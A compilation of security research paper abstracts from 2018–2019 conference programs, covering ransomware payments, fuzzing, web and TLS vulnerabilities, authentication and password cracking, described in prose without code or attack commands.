Ransomware is a type of malware that encrypts the files of infected hosts and demands payment, often in a crypto-currency like Bitcoin. In this paper, we create a measurement framework that we use to perform a large-scale, two-year, end-to-end measurement of ransomware payments, victims, and operators. By combining an array of data sources, including ransomware binaries, seed ransom payments, victim telemetry from infections, and a large database of bitcoin addresses annotated with their owners, we sketch the outlines of this burgeoning ecosystem and associated third-party infrastructure. In particular, we are able to trace the financial transactions, from the acquisition of bitcoins by victims, through the payment of ransoms, to the cash out of bitcoins by the ransomware operators. We find that many ransomware operators cashed out using BTC-e, a now-defunct Bitcoin exchange. In total we are able to track over $16 million USD in likely ransom payments made by 19,750 potential victims during a two-year period. While our study focuses on ransomware, our methods are potentially applicable to other cybercriminal operations that have similarly adopted Bitcoin as their payment channel.

Program Analysis

The Rise of the Citizen Developer: Assessing the Security Impact of Online App Generators

Mobile apps are increasingly created using online application generators (OAGs) that automate app development, distribution, and maintenance. These tools significantly lower the level of technical skill that is required for app development, which makes them particularly appealing to citizen developers, i.e., developers with little or no software engineering background. However, as the pervasiveness of these tools increases, so does their overall influence on the mobile ecosystem’s security, as security lapses by such generators affect thousands of generated apps. The security of such generated apps, as well as their impact on the security of the overall app ecosystem, has not yet been investigated.

We present the first comprehensive classification of commonly used OAGs for Android and show how to fingerprint uniquely generated apps to link them back to their generator. We thereby quantify the market penetration of these OAGs based on a corpus of 2,291,898 free Android apps from Google Play and discover that at least 11.1% of these apps were created using OAGs. Using a combination of dynamic, static, and manual analysis, we find that the services’ app generation model is based on boilerplate code that is prone to reconfiguration attacks in 7/13 analyzed OAGs. Moreover, we show that this boilerplate code includes well-known security issues such as code injection vulnerabilities and insecure WebViews. Given the tight coupling of generated apps with their services’ backends, we further identify security issues in their infrastructure. Due to the blackbox development approach, citizen developers are unaware of these hidden problems that ultimately put the end-users sensitive data and privacy at risk and violate the user’s trust assumption. A particular worrisome result of our study is that OAGs indeed have a significant amplification factor for those vulnerabilities, notably harming the health of the overall mobile app ecosystem.

Learning from Mutants: Using Code Mutation to Learn and Monitor Invariants of a Cyber-Physical System

Cyber-physical systems (CPS) consist of sensors, actuators, and controllers all communicating over a network; if any subset becomes compromised, an attacker could cause significant damage. With access to data logs and a model of the CPS, the physical effects of an attack could potentially be detected before any damage is done. Manually building a model that is accurate enough in practice, however, is extremely difficult. In this paper, we propose a novel approach for constructing models of CPS automatically, by applying supervised machine learning to data traces obtained after systematically seeding their software components with faults (“mutants”). We demonstrate the efficacy of this approach on the simulator of a real-world water purification plant, presenting a framework that automatically generates mutants, collects data traces, and learns an SVM-based model. Using cross-validation and statistical model checking, we show that the learnt model characterises an invariant physical property of the system. Furthermore, we demonstrate the usefulness of the invariant by subjecting the system to 55 network and code-modification attacks, and showing that it can detect 85% of them from the data logs generated at runtime.

Precise and Scalable Detection of Double-Fetch Bugs in OS Kernels

During system call execution, it is common for operating system kernels to read userspace memory multiple times (multi-reads). A critical bug may exist if the fetched userspace memory is subject to change across these reads, i.e., a race condition, which is known as a double-fetch bug. Prior works have attempted to detect these bugs both statically and dynamically. However, due to their improper assumptions and imprecise definitions regarding double-fetch bugs, their multi-read detection is inherently limited and suffers from significant false positives and false negatives. For example, their approach is unable to support device emulation, inter-procedural analysis, loop handling, etc. More importantly, they completely leave the task of finding real double-fetch bugs from the haystack of multi-reads to manual verification, which is expensive if possible at all.

In this paper, we first present a formal and precise definition of double-fetch bugs and then implement a static analysis system -Deadline - to automatically detect double-fetch bugs in OS kernels. Deadline uses static program analysis techniques to systematically find multi-reads throughout the kernel and employs specialized symbolic checking to vet each multi-read for double-fetch bugs. We apply Deadline to Linux and FreeBSD kernels and find 23 new bugs in Linux and one new bug in FreeBSD. We further propose four generic strategies to patch and prevent double-fetch bugs based on our study and the discussion with kernel maintainers.

CollAFL: Path Sensitive Fuzzing

Coverage-guided fuzzing is a widely used and ef- fective solution to find software vulnerabilities. Tracking code coverage and utilizing it to guide fuzzing are crucial to coverage- guided fuzzers. However, tracking full and accurate path coverage is infeasible in practice due to the high instrumentation overhead. Popular fuzzers (e.g., AFL) often use coarse coverage information, e.g., edge hit counts stored in a compact bitmap, to achieve highly efficient greybox testing. Such inaccuracy and incompleteness in coverage introduce serious limitations to fuzzers. First, it causes path collisions, which prevent fuzzers from discovering potential paths that lead to new crashes. More importantly, it prevents fuzzers from making wise decisions on fuzzing strategies.
In this paper, we propose a coverage sensitive fuzzing solution CollAFL. It mitigates path collisions by providing more accurate coverage information, while still preserving low instrumentation overhead. It also utilizes the coverage information to apply three new fuzzing strategies, promoting the speed of discovering new paths and vulnerabilities. We emented a prototype of CollAFL based on the popular fuzzer AFL and evaluated it on 24 popular applications. The results showed that path collisions are common, i.e., up to 75% of edges could collide with others in some applications, and CollAFL could reduce the edge collision ratio to nearly zero. Moreover, armed with the three fuzzing strategies, CollAFL outperforms AFL in terms of both code coverage and vulnerability discovery. On average, CollAFL covered 20% more program paths, found 320% more unique crashes and 260% more bugs than AFL in 200 hours. In total, CollAFL found 157 new security bugs with 95 new CVEs assigned.

T-Fuzz: fuzzing by program transformation

Fuzzing is a simple yet effective approach to discover software bugs utilizing randomly generated inputs. However, it is limited by coverage and cannot find bugs hidden in deep execution paths of the program because the randomly generated inputs fail complex sanity checks, e.g., checks on magic values, checksums, or hashes. To improve coverage, existing approaches rely on imprecise heuristics or complex input mutation techniques (e.g., symbolic execution or taint analysis) to bypass sanity checks. Our novel method tackles coverage from a different angle: by removing sanity checks in the target program. T-Fuzz leverages a coverage-guided fuzzer to generate inputs. Whenever the fuzzer can no longer trigger new code paths, a light-weight, dynamic tracing based technique detects the input checks that the fuzzer-generated inputs fail. These checks are then removed from the target program. Fuzzing then continues on the transformed program, allowing the code protected by the removed checks to be triggered and potential bugs discovered. Fuzzing transformed programs to find bugs poses two challenges: (1) removal of checks leads to over-approximation and false positives, and (2) even for true bugs, the crashing input on the transformed program may not trigger the bug in the original program. As an auxiliary post-processing step, T-Fuzz leverages a symbolic execution-based approach to filter out false positives and reproduce true bugs in the original program. By transforming the program as well as mutating the input, T-Fuzz covers more code and finds more true bugs than any existing technique. We have evaluated T-Fuzz on the DARPA Cyber Grand Challenge dataset, LAVA-M dataset and 4 real-world programs (pngfix, tiffinfo, magick and pdftohtml). For the CGC dataset, T-Fuzz finds bugs in 166 binaries, Driller in 121, and AFL in 105. In addition, found 3 new bugs in previously-fuzzed programs and libraries.

Fuzzing is a popular technique for finding software bugs. However, the performance of the state-of-the-art fuzzers leaves a lot to be desired. Fuzzers based on symbolic execution produce quality inputs but run slow, while fuzzers based on random mutation run fast but have difficulty producing quality inputs. We propose Angora, a new mutation-based fuzzer that outperforms the state-of-the-art fuzzers by a wide margin. The main goal of Angora is to increase branch coverage by solving path constraints without symbolic execution. To solve path constraints efficiently, we introduce several key techniques: scalable byte-level taint tracking, context-sensitive branch count, search based on gradient descent, and input length exploration. On the LAVA-M data set, Angora found almost all the injected bugs, found more bugs than any other fuzzer that we compared with, and found eight times as many bugs as the second-best fuzzer in the program who. Angora also found 103 bugs that the LAVA authors injected but could not trigger. We also tested Angora on eight popular, mature open source programs. Angora found 6, 52, 29, 40 and 48 new bugs in file, jhead, nm, objdump and size, respectively. We measured the coverage of Angora and evaluated how its key techniques contribute to its impressive performance.

Web

FP-STALKER: Tracking Browser Fingerprint Evolutions Along Time

Browser fingerprinting has emerged as a technique to track users without their consent. Unlike cookies, fingerprinting is a stateless technique that does not store any information on devices, but instead exploits unique combinations of attributes handed over freely by browsers. The uniqueness of fingerprints allows them to be used for identification. However, browser fingerprints change over time and the effectiveness of tracking users over longer durations has not been properly addressed.

In this paper, we show that browser fingerprints tend to change frequently-from every few hours to days-due to, for example, software updates or configuration changes. Yet, despite these frequent changes, we show that browser fingerprints can still be linked, thus enabling long-term tracking.

FP-STALKER is an approach to link browser fingerprint evolutions. It compares fingerprints to determine if they originate from the same browser. We created two variants of FP-STALKER, a rule-based variant that is faster, and a hybrid variant that exploits machine learning to boost accuracy. To evaluate FP-STALKER , we conduct an empirical study using 98,598 fingerprints we collected from 1, 905 distinct browser instances. We compare our algorithm with the state of the art and show that, on average, we can track browsers for 54.48 days, and 26 % of browsers can be tracked for more than 100 days.

Study and Mitigation of Origin Stripping Vulnerabilities in Hybrid-postMessage Enabled Mobile Applications

postMessage is popular in HTML5 based web apps to allow the communication between different origins. With the increasing popularity of the embedded browser (i.e., WebView) in mobile apps (i.e., hybrid apps), postMessage has found utility in these apps. However, different from web apps, hybrid apps have a unique requirement that their native code (e.g., Java for Android) also needs to exchange messages with web code loaded in WebView. To bridge the gap, developers typically extend postMessage by treating the native context as a new frame, and allowing the communication between the new frame and the web frames. We term such extended postMessage “hybrid postMessage” in this paper. We find that hybrid postMessage introduces new critical security flaws: all origin information of a message is not respected or even lost during the message delivery in hybrid postMessage. If adversaries inject malicious code into WebView, the malicious code may leverage the flaws to passively monitor messages that may contain sensitive information, or actively send messages to arbitrary message receivers and access their internal functionalities and data. We term the novel security issue caused by hybrid postMessage “Origin Stripping Vulnerability” (OSV).

In this paper, our contributions are fourfold. First, we conduct the first systematic study on OSV. Second, we propose a lightweight detection tool against OSV, called OSV-Hunter. Third, we evaluate OSV-Hunter using a set of popular apps. We found that 74 apps implemented hybrid postMessage, and all these apps suffered from OSV, which might be exploited by adversaries to perform remote real-time microphone monitoring, data race, internal data manipulation, denial of service (DoS) attacks and so on. Several popular development frameworks, libraries (such as the Facebook React Native framework, and the Google cloud print library) and apps (such as Adobe Reader and WPS office) are impacted. Lastly, to mitigate OSV from the root, we design and implement three new postMessage APIs, called OSV-Free. Our evaluation shows that OSV-Free is secure and fast, and it is generic and resilient to the notorious Android fragmentation problem. We also demonstrate that OSV-Free is easy to use, by applying OSV-Free to harden the complex “Facebook React Native” framework. OSV-Free is open source, and its source code and more implementation and evaluation details are available online.

Mobile Application Web API Reconnaissance: Web-to-Mobile Inconsistencies & Vulnerabilities

Modern mobile apps use cloud-hosted HTTP-based API services and heavily rely on the Internet infrastructure for data communication and storage. To improve performance and leverage the power of the mobile device, input validation and other business logic required for interfacing with web API services are typically implemented on the mobile client. However, when a web service implementation fails to thoroughly replicate input validation, it gives rise to inconsistencies that could lead to attacks that can compromise user security and privacy. Developing automatic methods of auditing web APIs for security remains challenging.

In this paper, we present a novel approach for automatically analyzing mobile app-to-web API communication to detect inconsistencies in input validation logic between apps and their respective web API services. We present our system, \sysname, which implements a static analysis-based web API reconnaissance approach to uncover inconsistencies on real world API services that can lead to attacks with severe consequences for potentially millions of users throughout the world. Our system utilizes program analysis techniques to automatically extract HTTP communication templates from Android apps that encode the input validation constraints imposed by the apps on outgoing web requests to web API services. WARDroid is also enhanced with blackbox testing of server validation logic to identify inconsistencies that can lead to attacks.

We evaluated our system on a set of 10,000 popular free apps from the Google Play Store. We detected problematic logic in APIs used in over 4,000 apps, including 1,743 apps that use unencrypted HTTP communication. We further tested 1,000 apps to validate web API hijacking vulnerabilities that can lead to potential compromise of user privacy and security and found that millions of users are potentially affected from our sample set of tested apps.

Enumerating Active IPv6 Hosts for Large-scale Security Scans via DNSSEC-signed Reverse Zones

Security research has made extensive use of exhaustive Internet-wide scans over the recent years, as they can provide significant insights into the overall state of security of the Internet, and ZMap made scanning the entire IPv4 address space practical. However, the IPv4 address space is exhausted, and a switch to IPv6, the only accepted long-term solution, is inevitable. In turn, to better understand the security of devices connected to the Internet, including in particular Internet of Things devices, it is imperative to include IPv6 addresses in security evaluations and scans. Unfortunately, it is practically infeasible to iterate through the entire IPv6 address space, as it is 2^96 times larger than the IPv4 address space. Therefore, enumeration of active hosts prior to scanning is necessary. Without it, we will be unable to investigate the overall security of Internet-connected devices in the future.

In this paper, we introduce a novel technique to enumerate an active part of the IPv6 address space by walking DNSSEC-signed IPv6 reverse zones. Subsequently, by scanning the enumerated addresses, we uncover significant security problems: the exposure of sensitive data, and incorrectly controlled access to hosts, such as access to routing infrastructure via administrative interfaces, all of which were accessible via IPv6. Furthermore, from our analysis of the differences between accessing dual-stack hosts via IPv6 and IPv4, we hypothesize that the root cause is that machines automatically and by default take on globally routable IPv6 addresses. This is a practice that the affected system administrators appear unaware of, as the respective services are almost always properly protected from unauthorized access via IPv4.

Our findings indicate (i) that enumerating active IPv6 hosts is practical without a preferential network position contrary to common belief, (ii) that the security of active IPv6 hosts is currently still lagging behind the security state of IPv4 hosts, and (iii) that unintended IPv6 connectivity is a major security issue for unaware system administrators.

Tracking Certificate Misissuance in the Wild

Certificate Authorities (CAs) regularly make mechanical errors when issuing certificates. To quantify these errors, we introduce ZLint, a certificate linter that codifies the policies set forth by the CA/Browser Forum Baseline Requirements and RFC 5280 that can be tested in isolation. We run ZLint on browser-trusted certificates in Censys and systematically analyze how well CAs construct certificates. We find that the number errors has drastically reduced since 2012. In 2017, only 0.02% of certificates have errors. However, this is largely due to a handful of large authorities that consistently issue correct certificates. There remains a long tail of small authorities that regularly issue non-conformant certificates. We further find that issuing certificates with errors is correlated with other types of mismanagement and for large authorities, browser action. Drawing on our analysis, we conclude with a discussion on how the community can best use lint data to identify authorities with worrisome organizational practices and ensure long-term health of the Web PKI.

A Formal Treatment of Accountable Proxying over TLS

Much of Internet traffic nowadays passes through active proxies, whose role is to inspect, filter, cache, or trans- form data exchanged between two endpoints. To perform their tasks, such proxies modify channel-securing protocols, like TLS, resulting in serious vulnerabilities. Such problems are exacerbated by the fact that middleboxes are often invisible to one or both endpoints, leading to a lack of accountability. A recent protocol, called mcTLS, pioneered accountability for proxies, which are authorized by the endpoints and given limited read/write permissions to application traffic.

Unfortunately, we show that mcTLS is insecure: the protocol modifies the TLS protocol, exposing it to a new class of middlebox-confusion attacks. Such attacks went unnoticed mainly because mcTLS lacked a formal analysis and security proofs. Hence, our second contribution is to formalize the goal of accountable proxying over secure channels. Third, we propose a provably-secure alternative to soon-to-be-standardized mcTLS: a generic and modular protocol-design that care- fully composes generic secure channel-establishment protocols, which we prove secure. Finally, we present a proof-of-concept implementation of our design, instantiated with unmodified TLS 1.3, and evaluate its overheads.

Authentication

Secure Device Bootstrapping without Secrets Resistant to Signal Manipulation Attacks

In this paper, we address the fundamental problem of securely bootstrapping a group of wireless devices to a hub, when none of the devices share prior associations (secrets) with the hub or between them. This scenario aligns with the secure deployment of body area networks, IoT, medical devices, industrial automation sensors, autonomous vehicles, and others. We develop VERSE, a physical-layer group message integrity verification primitive that effectively detects advanced wireless signal manipulations that can be used to launch man-in-the-middle (MitM) attacks over wireless. Without using shared secrets to establish authenticated channels, such attacks are notoriously difficult to thwart and can undermine the authentication and key establishment processes. VERSE exploits the existence of multiple devices to verify the integrity of the messages exchanged within the group. We then use VERSE to build a bootstrapping protocol, which securely introduces new devices to the network. Compared to the state-of-the-art, VERSE achieves in-band message integrity verification during secure pairing using only the RF modality without relying on out-of-band channels or extensive human involvement. It guarantees security even when the adversary is capable of fully controlling the wireless channel by annihilating and injecting wireless signals. We study the limits of such advanced wireless attacks and prove that the introduction of multiple legitimate devices can be leveraged to increase the security of the pairing process. We validate our claims via theoretical analysis and extensive experimentations on the USRP platform. We further discuss various implementation aspects such as the effect of time synchronization between devices and the effects of multipath and interference. Note that the elimination of shared secrets, default passwords, and public key infrastructures effectively addresses the related key management challenges when these are considered at scale.

Do You Feel What I Hear? Enabling Autonomous IoT Device Pairing using Different Sensor Types

Context-based pairing solutions increase the usability of IoT device pairing by eliminating any human involvement in the pairing process. This is possible by utilizing on-board sensors (with same sensing modalities) to capture a common physical context (e.g., ambient sound via each device’s microphone). However, in a smart home scenario, it is impractical to assume that all devices will share a common sensing modality. For example, a motion detector is only equipped with an infrared sensor while Amazon Echo only has microphones. In this paper, we develop a new context-based pairing mechanism called Perceptio that uses time as the common factor across differing sensor types. By focusing on the event timing, rather than the specific event sensor data, Perceptio creates event fingerprints that can be matched across a variety of IoT devices. We propose Perceptio based on the idea that devices co-located within a physically secure boundary (e.g., single family house) can observe more events in common over time, as opposed to devices outside. Devices make use of the observed contextual information to provide entropy for Perceptio’s pairing protocol. We design and implement Perceptio, and evaluate its effectiveness as an autonomous secure pairing solution. Our implementation demonstrates the ability to sufficiently distinguish between legitimate devices (placed within the boundary) and attacker devices (placed outside) by imposing a threshold on fingerprint similarity. Perceptio demonstrates an average fingerprint similarity of 94.9% between legitimate devices while even a hypothetical impossibly well-performing attacker yields only 68.9% between itself and a valid device.

On the Economics of Offline Password Cracking

We develop an economic model of an offline password cracker which allows us to make quantitative predictions about the fraction of accounts that a rational password attacker would crack in the event of an authentication server breach. We apply our economic model to analyze recent massive password breaches at Yahoo!, Dropbox, LastPass and AshleyMadison. All four organizations were using key-stretching to protect user passwords. In fact, LastPass’ use of PBKDF2-SHA256 with $10^5$ hash iterations exceeds 2017 NIST minimum recommendation by an order of magnitude. Nevertheless, our analysis paints a bleak picture: the adopted key-stretching levels provide insufficient protection for user passwords. In particular, we present strong evidence that most user passwords follow a Zipf’s law distribution, and characterize the behavior of a rational attacker when user passwords are selected from a Zipf’s law distribution. We show that there is a finite threshold which depends on the Zipf’s law parameters that characterizes the behavior of a rational attacker — if the value of a cracked password (normalized by the cost of computing the password hash function) exceeds this threshold then the adversary’s optimal strategy is always to continue attacking until each user password has been cracked. In all cases (Yahoo!, Dropbox, LastPass and AshleyMadison) we find that the value of a cracked password almost certainly exceeds this threshold meaning that a rational attacker would crack all passwords that are selected from the Zipf’s law distribution (i.e., most user passwords). This prediction holds even if we incorporate an aggressive model of diminishing returns for the attacker (e.g., the total value of $500$ million cracked passwords is less than $100$ times the total value of $5$ million passwords). On a positive note our analysis demonstrates that memory hard functions (MHFs) such as SCRYPT or Argon2i can significantly reduce the damage of an offline attack. In particular, we find that because MHFs substantially increase guessing costs a rational attacker will give up well before he cracks most user passwords and this prediction holds even if the attacker does not encounter diminishing returns for additional cracked passwords. Based on our analysis we advocate that password hashing standards should be updated to require the use of memory hard functions for password hashing and disallow the use of non-memory hard functions such as BCRYPT or PBKDF2.

A Tale of Two Studies: The Best and Worst of YubiKey Usability

Two-factor authentication (2FA) significantly improves the security of password-based authentication. Recently, there has been increased interest in Universal 2nd Factor (U2F) security keys-small hardware devices that require users to press a button on the security key to authenticate. To examine the usability of security keys in non-enterprise usage, we conducted two user studies of the YubiKey, a popular line of U2F security keys. The first study tasked 31 participants with configuring a Windows, Google, and Facebook account to authenticate using a YubiKey. This study revealed problems with setup instructions and workflow including users locking themselves out of their operating system or thinking they had successfully enabled 2FA when they had not. In contrast, the second study had 25 participants use a YubiKey in their daily lives over a period of four weeks, revealing that participants generally enjoyed the experience. Conducting both a laboratory and longitudinal study yielded insights into the usability of security keys that would not have been evident from either study in isolation. Based on our analysis, we recommend standardizing the setup process, enabling verification of success, allowing shared accounts, integrating with operating systems, and preventing lockouts.

When Your Fitness Tracker Betrays You: Quantifying the Predictability of Biometric Features Across Contexts

Attacks on behavioral biometrics have become increasingly popular. Most research has been focused on presenting a previously obtained feature vector to the biometric sensor, often by the attacker training themselves to change their behavior to match that of the victim. However, obtaining the victim’s biometric information may not be easy, especially when the user’s template on the authentication device is adequately secured. As such, if the authentication device is inaccessible, the attacker may have to obtain data elsewhere. In this paper, we present an analytic framework that enables us to measure how easily features can be predicted based on data gathered in a different context (e.g., different sensor, performed task or environment). This framework is used to assess how resilient individual features or entire biometrics are against such cross-context attacks. In order to be able to compare existing biometrics with regard to this property, we perform a user study to gather biometric data from 30 participants and ?ve biometrics (ECG, eye movements, mouse movements, touchscreen dynamics and gait) in a variety of contexts. We make this dataset publicly available online. Our results show that many attack scenarios are viable in practice as features are easily predicted from a variety of contexts. All biometrics include features that are particularly predictable (e.g., amplitude features for ECG or curvature for mouse movements). Overall, we observe that cross-context attacks on eye movements, mouse movements and touchscreen inputs are comparatively easy while ECG and gait exhibit much more chaotic cross-context changes.

2019 program dblp

Session 3: Web Security

Does Certificate Transparency Break the Web? Measuring Adoption and Error Rate

Certificate Transparency (CT) is an emerging system for enabling the rapid discovery of malicious or misissued certificates. Initially standardized in 2013, CT is now finally beginning to see widespread support. Although CT provides desirable security benefits, web browsers cannot begin requiring all websites to support CT at once, due to the risk of breaking large numbers of websites. We discuss challenges for deployment, analyze the adoption of CT on the web, and measure the error rates experienced by users of the Google Chrome web browser. We find that CT has so far been widely adopted with minimal breakage and warnings.

Security researchers often struggle with the tradeoff between security and user frustration: rolling out new security requirements often causes breakage. We view CT as a case study for deploying ecosystem-wide change while trying to minimize end user impact. We discuss the design properties of CT that made its success possible, as well as draw lessons from its risks and pitfalls that could be avoided in future large-scale security deployments.

EmPoWeb: Empowering Web Applications with Browser Extensions

Browser extensions are third party programs, tightly integrated to browsers, where they execute with elevated privileges in order to provide users with additional functionalities. Unlike web applications, extensions are not subject to the Same Origin Policy (SOP) and therefore can read and write user data on any web application. They also have access to sensitive user information including browsing history, bookmarks, credentials (cookies) and list of installed extensions. They have access to a permanent storage in which they can store data as long as they are installed in the user’s browser. They can trigger the download of arbitrary files and save them on the user’s device.

For security reasons, browser extensions and web applications are executed in separate contexts. Nonetheless, in all major browsers, extensions and web applications can interact by exchanging messages. Through these communication channels, a web application can exploit extension privileged capabilities and thereby access and exfiltrate sensitive user information.

In this work, we analyzed the communication interfaces exposed to web applications by Chrome, Firefox and Opera browser extensions. As a result, we identified many extensions that web applications can exploit to access privileged capabilities. Through extensions’ APIS, web applications can bypass SOP and access user data on any other web application, access user credentials (cookies), browsing history, bookmarks, list of installed extensions, extensions storage, and download and save arbitrary files in the user’s device.

Our results demonstrate that the communications between browser extensions and web applications pose serious security and privacy threats to browsers, web applications and more importantly to users. We discuss countermeasures and proposals, and believe that our study and in particular the tool we used to detect and exploit these threats, can be used as part of extensions review process by browser vendors to help them identify and fix the aforementioned problems in extensions.

“If HTTPS Were Secure, I Wouldn’t Need 2FA” - End User and Administrator Mental Models of HTTPS

HTTPS is one of the most important protocols used to secure communication and is, fortunately, becoming more pervasive. However, especially the long tail of websites is still not sufficiently secured.
HTTPS involves different types of users, e.g., end users who are forced to make critical security decisions when faced with warnings or administrators who are required to deal with cryptographic fundamentals and complex decisions concerning compatibility.

In this work, we present the first qualitative study of both end user and administrator mental models of HTTPS. We interviewed 18 end users and 12 administrators; our findings reveal misconceptions about security benefits and threat models from both groups. We identify protocol components that interfere with secure configurations and usage behavior and reveal differences between administrator and end user mental models.

Our results suggest that end user mental models are more conceptual while administrator models are more protocol-based. We also found that end users often confuse encryption with authentication, significantly underestimate the security benefits of HTTPS, and ignore and distrust security indicators while administrators often do not understand the interplay of functional protocol components. Based on the different mental models, we discuss implications and provide actionable recommendations for future designs of user interfaces and protocols.

Fidelius: Protecting User Secrets from Compromised Browsers

Users regularly enter sensitive data, such as passwords, credit card numbers, or tax information, into the browser window. While modern browsers provide powerful client-side privacy measures to protect this data, none of these defenses prevent a browser compromised by malware from stealing it. In this work, we present Fidelius, a new architecture that uses trusted hardware enclaves integrated into the browser to enable protection of user secrets during web browsing sessions, even if the entire underlying browser and OS are fully controlled by a malicious attacker.

Fidelius solves many challenges involved in providing protection for browsers in a fully malicious environment, offering support for integrity and privacy for form data, JavaScript execution, XMLHttpRequests, and protected web storage, while minimizing the TCB. Moreover, interactions between the enclave and the browser, the keyboard, and the display all require new protocols, each with their own security considerations. Finally, Fidelius takes into account UI considerations to ensure a consistent and simple interface for both developers and users.

As part of this project, we develop the first open source system that provides a trusted path from input and output peripherals to a hardware enclave with no reliance on additional hypervisor security assumptions. These components may be of independent interest and useful to future projects.

We implement and evaluate Fidelius to measure its performance overhead, finding that Fidelius imposes acceptable overhead on page load and user interaction for secured pages and has no impact on pages and page components that do not use its enhanced security features.

Postcards from the Post-HTTP World: Amplification of HTTPS Vulnerabilities in the Web Ecosystem

HTTPS aims at securing communication over the Web by providing a cryptographic protection layer that ensures the confidentiality and integrity of communication and enables client/server authentication. However, HTTPS is based on the SSL/TLS protocol suites that have been shown to be vulnerable to various attacks in the years. This has required fixes and mitigations both in the servers and in the browsers, producing a complicated mixture of protocol versions and implementations in the wild, which makes it unclear which attacks are still effective on the modern Web and what is their import on web application security. In this paper, we present the first systematic quantitative evaluation of web application insecurity due to cryptographic vulnerabilities. We specify attack conditions against TLS using attack trees and we crawl the Alexa Top 10k to assess the import of these issues on page integrity, authentication credentials and web tracking. Our results show that the security of a consistent number of websites is severely harmed by cryptographic weaknesses that, in many cases, are due to external or related-domain hosts. This empirically, yet systematically demonstrates how a relatively limited number of exploitable HTTPS vulnerabilities are amplified by the complexity of the web ecosystem.

Session 6: Protocols and Authentication

Reasoning Analytically About Password-Cracking Software

A rich literature has presented efficient techniques for estimating password strength by modeling password-cracking algorithms. Unfortunately, these previous techniques only apply to probabilistic password models, which real attackers seldom use. In this paper, we introduce techniques to reason analytically and efficiently about transformation-based password cracking in software tools like John the Ripper and Hashcat. We define two new operations, rule inversion and guess counting, with which we analyze these tools without needing to enumerate guesses. We implement these techniques and find orders-of-magnitude reductions in the time it takes to estimate password strength. We also present four applications showing how our techniques enable increased scientific rigor in optimizing these attacks’ configurations. In particular, we show how our techniques can leverage revealed password data to improve orderings of transformation rules and to identify rules and words potentially missing from an attack configuration. Our work thus introduces some of the first principled mechanisms for reasoning scientifically about the types of password-guessing attacks that occur in practice.

True2F: Backdoor-Resistant Authentication Tokens

We present True2F, a system for second-factor authentication that provides the benefits of conventional authentication tokens in the face of phishing and software compromise, while also providing strong protection against token faults and backdoors. To do so, we develop new lightweight two-party protocols for generating cryptographic keys and ECDSA signatures, and we implement new privacy defenses to prevent cross-origin token-fingerprinting attacks. To facilitate real-world deployment, our system is backwards-compatible with today’s U2F-enabled web services and runs on commodity hardware tokens after a firmware modification. A True2F-protected authentication takes just 57ms to complete on the token, compared with 23ms for unprotected U2F.

Beyond Credential Stuffing: Password Similarity Models using Neural Networks

Attackers increasingly use passwords leaked from one website to compromise associated accounts on other websites. Such targeted attacks work because users reuse, or pick similar, passwords for different websites. We recast one of the core technical challenges underlying targeted attacks as the task of modeling similarity of human-chosen passwords. We show how to learn good password similarity models using a compilation of 1.4 billion leaked email, password pairs. Using our trained models of password similarity, we exhibit the most damaging targeted attack to date. Simulations indicate that our attack compromises more than 16% of user accounts in less than a thousand guesses, should one of their other passwords be known to the attacker and despite the use of state-of-the art countermeasures. We show via a case study involving a large university authentication service that the attacks are also effective in practice. We go on to propose the first-ever defense against such targeted attacks, by way of personalized password strength meters (PPSMs). These are password strength meters that can warn users when they are picking passwords that are vulnerable to attacks, including targeted ones that take advantage of the user’s previously compromised passwords. We design and build a PPSM that can be compressed to less than 3 MB, making it easy to deploy in order to accurately estimate the strength of a password against all known guessing attacks.

The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations

At CRYPTO’98, Bleichenbacher published his seminal paper which described a padding oracle attack against RSA implementations that follow the PKCS #1 v1.5 standard. Over the last twenty years researchers and implementors had spent a huge amount of effort in developing and deploying numerous mitigation techniques which were supposed to plug all the possible sources of Bleichenbacher-like leakages. However, as we show in this paper, most implementations are still vulnerable to several novel types of attack based on leakage from various microarchitectural side channels: Out of nine popular implementations of TLS that we tested, we were able to break the security of seven implementations with practical proof-of-concept attacks. We demonstrate the feasibility of using those Cache-like ATacks (CATs) to perform a downgrade attack against any TLS connection to a vulnerable server, using a BEAST-like Man in the Browser attack. The main difficulty we face is how to perform the thousands of oracle queries required before the browser’s imposed timeout (which is 30 seconds for almost all browsers, with the exception of Firefox which can be tricked into extending this period). Due to its use of adaptive chosen ciphertext queries, the attack seems to be inherently sequential, but we describe a new way to parallelize Bleichenbacher-like padding attacks by exploiting any available number of TLS servers that share the same public key certificate. With this improvement, we can demonstrate the feasibility of a downgrade attack which could recover all the 2048 bits of the RSA plaintext (including the premaster secret value, which suffices to establish a secure connection) from five available TLS servers in under 30 seconds. This sequential-to-parallel transformation of such attacks can be of independent interest, speeding up and facilitating other side channel attacks on RSA implementations.

An Extensive Formal Security Analysis of the OpenID Financial-grade API

Forced by regulations and industry demand, banks worldwide are working to open their customers’ online banking accounts to third-party services via web-based APIs. By using these so-called Open Banking APIs, third-party companies, such as FinTechs, are able to read information about and initiate payments from their users’ bank accounts. Such access to financial data and resources needs to meet particularly high security requirements to protect customers. One of the most promising standards in this segment is the OpenID Financial-grade API (FAPI), currently under development in an open process by the OpenID Foundation and backed by large industry partners. The FAPI is a profile of OAuth 2.0 designed for high-risk scenarios and aiming to be secure against very strong attackers. To achieve this level of security, the FAPI employs a range of mechanisms that have been developed to harden OAuth 2.0, such as Code and Token Binding (including mTLS and OAUTB), JWS Client Assertions, and Proof Key for Code Exchange. In this paper, we perform a rigorous, systematic formal analysis of the security of the FAPI, based on an existing comprehensive model of the web infrastructure - the Web Infrastructure Model (WIM) proposed by Fett, Küsters, and Schmitz. To this end, we first develop a precise model of the FAPI in the WIM, including different profiles for read-only and read-write access, different flows, different types of clients, and different combinations of security features, capturing the complex interactions in a web-based environment. We then use our model of the FAPI to precisely define central security properties. In an attempt to prove these properties, we uncover partly severe attacks, breaking authentication, authorization, and session integrity properties. We develop mitigations against these attacks and finally are able to formally prove the security of a fixed version of the FAPI. Although financial applications are high-stakes environments, this work is the first to formally analyze and, importantly, verify an Open Banking security profile. By itself, this analysis is an important contribution to the development of the FAPI since it helps to define exact security properties and attacker models, and to avoid severe security risks before the first implementations of the standard go live. Of independent interest, we also uncover weaknesses in the aforementioned security mechanisms for hardening OAuth 2.0. We illustrate that these mechanisms do not necessarily achieve the security properties they have been designed for.

Session 8: Machine Learning

Certified Robustness to Adversarial Examples with Differential Privacy

